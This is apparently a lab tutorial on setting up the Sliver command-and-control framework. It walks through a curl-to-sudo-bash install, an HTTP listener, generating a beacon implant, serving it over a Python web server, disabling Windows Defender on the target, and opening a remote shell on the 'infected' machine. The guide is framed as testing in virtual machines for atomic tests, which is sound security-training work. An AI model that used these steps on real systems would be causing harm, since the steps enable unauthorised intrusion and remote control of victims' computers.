This tutorial will cover how to setup a Sliver host (Tested with Ubuntu 20.04 but should work with other distributions)
To get started, the simplest way is to utilize their 'one-liner' installation.
Simply go to any terminal with elevated permissions and run
curl https://sliver.sh/install | sudo bash
This should begin the installation process for whatever version of Linux you are using.
Note: The Sliver host can be a Windows machine, but Sliver themselves advise against it as some features will not work as expected
Before you run the service, you may want to install mingw-w64
to allow DLL payloads and shellcode to be deployed.
To run the service, simply type sliver
into your terminal and it should start up.
Before you start the service, please take note of your IP address using either ip address
or hostname -I
if not already known
The most basic feature that we will be utilizing first is a listener. To start a listener, open sliver and input http -l <port>
. You can also just run http
to open the default port of 80. However, I used port 8080 as this will be useful in future steps when running the file server.
If you attempt to open a port that is already running a listener, your output will look like this:
Whereas open ports should look like this:
For now, just open one listener at port 8080 and then continue on in this guide.
If you wish to see which listeners are running, type jobs
into the terminal to see
The next step is to utilize this listener using a beacon. A beacon is a generated executable that once run on the machine to be infected (we'll get there soon), will allow you to run commands as said infected computer.
If you are targeting a Linux Machine instead of a Windows machine, please look here! Linux Instructions
To create the beacon, you will run a command similar to the following:
generate beacon -b <YOURLINUXIP>:8080
This will create an executable which you will serve up to the machine that is to be 'infected' (for non-malicious purposes, of course)
The next step is somewhat up to personal preference and can be done in countless ways. The way I will be covering will be using python, but you can also use apache or any other http protocol file server of your choice. This step doesn't even need to necessarily be done using HTTP, as there are also DNS, TCP, and other methods of transferring this executable, but HTTP is the simplest, so that's the one we went with.
To start a webserver using python, first check that you have python installed on your machine (it does not need to be python3).
I would highly recommend hosting this server as a background process using & so that you can reopen sliver, although you could also run this server inside a container or on another page of your terminal if your machine supports that.
If you have python3, you can run this command: python3 -m http.server &
. If you have a valid internet connection, you should get a response saying your machine is now hosting on 0.0.0.0:8000.
If you do not have python3, you can run this command: python -m SimpleHTTPServer &
.
Both of these methods should result in the same outcome, with a simple http server hosting the files on your current directory.
Now that we have a file server on our Linux machine that is serving up the executable file, we can move on to our Windows Machine.
Note the infected machine can also be a Linux machine, but it will not have some of the same features as a Windows client
Infecting the Windows Machine will first and foremost require some changes to Windows Defender. Sadly, due to the popularity of this tool, Windows Defender has wisened up and will recognize the signature, not allowing you to run the executable otherwise. Locate the Virus & threat protection settings using the search bar:
Go to Virus & Threat protection settings:
And at the bare minimum, disable Automatic sample submission:
I went ahead and disabled all, as this is a virtual machine purely for the sake of testing and didn't want any impedence.
Next, open any internet browser (I used Internet Explorer) and access the file server that was previously opened in the Serve Up Executable step.
What you should then find is a very simple webpage with the files listed at the directory where the executable is. (You should only see one executable, unless you generated multiple like me)
If there is no page found, then you probably are experiencing the same issue I was, which is... networking. To fix this, I utilized Port Forwarding on Virtualbox between my two machines, and a inter-machine NAT Network that took a while to figure out. Networking with virtual machines can be a huge pain, so if you like a guide, I would look here
Otherwise, you should see something like this
Next, click on the hyperlink to the executable and run:
Upon doing so, Sliver should hint that someone is falling for the trap!
Once the executable is done running, you are done with the client. You're in, that easy!
These instructions are the same for both Windows and Linux
Upon the executable finishing its execution, you should see this on your sliver host:
You can type beacons
into your terminal to see the newly infected computer available to your host (i've done this a few times):
Next, you will open up a session with your infected client.
Simply type use
, tab to auto fill the session id, and press enter on the desired session:
Now that the session is open, you have a myriad of options available to you. I will not cover all of them, except an important one, which is opening a powershell session on the infected client.
These instructions are the same for both Windows and Linux
To open a shell, you will need to create an interactive
session.
To do so, first type interactive
into your terminal.
Open that new session using use (In the image above, the first part of the id you want to find is referenced, in this case 10329df6 ...
):
This will open an 'interactive' session which will allow you to run a shell (you may need to wait for the command to run, because beacons use a periodic execution strategy to avoid detection).
To confirm if you are in the correct session, your terminal should be red if you are in an interactive session.
Now, simply type shell
into your terminal, accept the disclaimer, and you can now run powershell / bash commands on your client as if you were the user!
This shell can now be used to run atomic tests, or whatever else you could think to do with this.
Bonus: Even though the executable can be run without elevated permissions, sudo commands can be run.
Neat!